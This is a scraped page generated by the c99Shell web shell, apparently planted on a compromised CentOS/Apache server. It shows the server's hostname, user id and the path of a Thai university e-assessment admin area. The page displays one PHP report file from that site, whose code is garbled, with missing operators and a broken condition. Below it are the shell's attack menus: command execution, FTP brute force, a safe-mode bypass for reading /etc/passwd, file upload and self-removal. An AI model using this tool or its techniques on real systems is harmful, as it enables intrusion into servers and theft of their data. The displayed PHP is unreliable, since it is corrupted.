!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/fileupdate/eassess/admin/   drwxr-xr-x
Free 50.75 GB of 127.8 GB (39.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     2553-09-26-1.1.05-headReport.php (10.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
echo "defindId = ".$defineid;
echo "courseId = ".$courseId;
echo "classId  = ".$classId;
echo "officerId = ".$officerId;
echo "programId =".$programId;
*/

if($courseId != '%'){

    
$numAllCourseReg=0;
    if(
$mepId=='%'){
        
//$numAllCourseReg = $oReg->CTByAcYSeClassIdCoId($acadYear,$semester,$classId,$courseId);
        
$numAllCourseReg $oReg->CTByAcYSeClassIdCoIdOff($acadYear,$semester,$classId,$courseId,$officerId);
        
$numAllDo=$numAllCourseReg;
                
// หลายสัปดาห์
        
if($officerId != && $ttId==0){
            
$week=0;
            
$oTTA->RSJoinHCByDefineidClIdOfId($defineid,$classId,$officerId);
            while(
$oTTA->GetRecord()){
                
$week++;
            }
            
$numAllDo=$numAllCourseReg*$week;
        }

        
$numCourseDoAss 0;
        if(
$ttId==0){
            
$numCourseDoAss=$oDo->CountStdByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId);
        }else{
            
$numCourseDoAss=$oDo->CountDistinctStdByDefineidOfficeridClassIdttId($defineid,$officerId,$classId,$ttId);
        }

        
$numDoAss $oDo->CountDoidByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId);
    }else{
        
$numAllCourseReg $oReg->CTByAcYSeClassCoOfMepSep($acadYear,$semester,$classId,$courseId,'%',$mepId,$sepId);
        
$numAllDo=$numAllCourseReg;

        
$numCourseDoAss 0;
        
$numCourseDoAss=$oDo->CountStdByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId,$mepId,$sepId);

        
$numDoAss $oDo->CountDoidByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId,$mepId,$sepId);
    }

}
?>
<table width="100%" border="0" align="center">
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>">
                          <td><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชื่อแบบประเมิน </b></font></td>
                          <td colspan="3"><font size="2"><b>: </b> 
                            <? if($oAF->maintopic == ""){ echo "-"; }else{ echo $oAF->maintopic; } ?>
                            </font></td>
                        </tr>
<!--                    <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชื่อทั่วไปแบบประเมิน</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b><? echo $oAF->nameAss ?></font></td>
                        </tr> -->
                        <tr> 
                          <td width="164"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ปีการศึกษา</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b></font><? echo $acadYear ?> 
                            / <? echo $oSse->semesterName;?></td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22" <? if(($oClass->programId == 0) || ($oClass->programId == "")){ echo "valign=\"baseline\""; } ?>><font size="2"><b><img src="../picture/bullet.gif"> หลักสูตร</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> <?=$oProg->programName;?>
                            </font></td>
                        </tr>
<?          if($classId != '%' ){   ?>
                        <tr> 
                          <td width="164"><font size="2"><b><img src="../picture/bullet.gif"> 
                            รหัสรายวิชา</b></font></td>
                          <td width="136"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseCode?> 
                            (<?php echo $oCourse->courseCodeEng?>)</font></td>
                          <td width="130">&nbsp;</td>
                            <td  width="150">&nbsp;</td>
                        </tr>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชื่อรายวิชา</b></font></td>
                          <td colspan="3"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseName?></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                            (<?php echo $oCourse->courseNameEng?>) </font></td>
                        </tr>
<?          }     ?>
                        <tr> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ช่วงเวลาประเมิน</b></font></td>
                          <td colspan="2"><font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><? echo abbreDate(splitDateDb2($oDA->startDate,'/')); ?> 
                            - <? echo abbreDate(splitDateDb2($oDA->endDate,'/'));  ?></font></td>
                             
<?                      if($classId != '%' ){   ?>
                          <td height="22" ><font size="2"><b><img src="../picture/bullet.gif"> 
                            ชั้นปี : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oClass->studentYear?>   </font><font size="2"><b> 
                            <img src="../picture/bullet.gif" /> กลุ่ม : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oClass->section?></font></td>
                        </tr>

<?                      }
                        if(
$mepId=='%') {     ?>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ประเมินอาจารย์</b></font></td>
                            <? if($officerId!=0){ ?> <td ><? }else {?><td colspan="3"><? }?>
                            <font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                            <?php if($officerId == ""){ ?>
                            <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"><? echo "- ไม่พบรายชื่ออาจารย์ผู้สอน -"?></font> 
                            <? }elseif($officerId == '%' ){
                                    
$t=0;
                                    if(
$classId == '%')
                                        
$oCIS->RSByAcYSePgIdCoId($acadYear,$semester,$programId,$courseId);
                                    else
                                        
$oCIS->SearchByClassIdGroupClassIdOfficerId($classId);
                                    while(
$oCIS->GetRecord()){
                                        
$oOFA->SearchByKey($oCIS->officerId);
                                        
$oOFA->GetRecord();
                                        
$Teachers[$t] = "อ.".$oOFA->officerName." ".$oOFA->officerSurname;
                                        
$t++;
                                    }
                                    echo 
"<img src=\"../picture/usersGp.gif\"  border =\"0\">&nbsp;";
                                    for(
$s=0;$s<$t;$s++){        
                                        echo 
$Teachers[$s];
                                        if(
$s<$t-1){
                                            echo 
",&nbsp;";
                                        }
                                    }
                                  }else{ 
                                    
$oOFA->SearchByKey($officerId);
                                    
$oOFA->GetRecord();
                                    echo 
$oOFA->prefixName.$oOFA->officerName."&nbsp;&nbsp;".$oOFA->officerSurname
                                  } 
?>
                            </font></td>
                             <? if($oDA->flag==7){ //$officerId!=0?> 
                        <td  align="left" colspan="2"><img src="../picture/bullet.gif" /><font size="2"><b> สัปดาห์ที่ : </b></font>
                        <? if($ttId!=0){
                                
$oTTA->SearchTimeTableByttId($ttId);
                                
$oTTA->GetRecord();
                                 echo 
$oTTA->ttWdAcYWeekNo;
                            }else{
                                
$i=0;
                                 
$oTTA->RSJoinHCByDefineidClIdOfId($defineid,$classId,$officerId);
                                while(
$oTTA->GetRecord()){
                                    if(
$i>=1)
                                        echo 
" , " ;
                                    echo 
$oTTA->ttWdAcYWeekNo;
                                    
$i=$i+1;
                                }
                            }                            
                        
?>                        </td>
                        <? ?>
                        </tr>
<?                      }else{     
                                
$oMep->SearchById($mepId);
                                
$oMep->GetRecord();
                                
$oSep->SearchByKey($sepId);
                                
$oSep->GetRecord();
?>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ประเมิน     </b></font></td>
                          <td colspan="3">
                            <font size="2"><b>: </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">
                               <?php echo $oMep->mepName.", ".$oSep->sepName?>
                            </font></td>
                        </tr>
<?                      }     ?>
<?              
if($courseId != '%'){    ?>
                        <tr> 
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> นักศึกษาที่ลงทะเบียน : </b><?=$numAllCourseReg ?><b>   คน</b></font></td>
                          <? if($oDA->flag==7) {?>
                          <td height="22" colspan="2"><img src="../picture/bullet.gif" /><font size="2"><b> ประเมิน : </b>
                              <? if($ttId!=0) echo '1'; else echo $i;    ?>
                              <b>   สัปดาห์</b></font></td>
                          <? }else{ ?> <td height="22" colspan="2">&nbsp;</td> <? }?>
                        </tr>
                        <? if($oDA->flag==) {   //|| $classId == '%' ?>
                        <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_11'];?>"> 
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                            จำนวนครั้งที่ต้องประเมิน : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?=$numAllDo?><b>   ครั้ง</b></font></td>
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                           จำนวนครั้งที่เข้ามาประเมิน : </b></font><font size="2"> <? echo $numDoAss ?>
                            <b>   ครั้ง</b></font></td>
                        </tr>
                        <? }// end $officerId!=0?>
                        <tr> 
                            <?    if($oDA->flag==7) {?>
                          <td height="22" colspan="2">&nbsp;</td>
                              <?    }else{?>
                            <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                           นักศึกษาที่เข้าประเมิน : </b></font><font size="2"> <? echo $numCourseDoAss ?>
                            <b>   คน</b></font></td>
                            <? $numAllDo=$numAllCourseReg;} ?>
                          <td height="22" colspan="2"><font size="2"><b><img src="../picture/bullet.gif"> 
                            ร้อยละเฉลี่ยการเข้ามาประเมิน : </b></font><font size="2"> 
                            <? $percentDo = ($numCourseDoAss/$numAllDo)*100;  printf ("%.2f",$percentDo);?>
                            </font></td>
                        </tr>
<?                  }//end if($courseId != '%')     ?>
                        <tr><td colspan="4">&nbsp;</td></tr>
                      </table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0134 ]--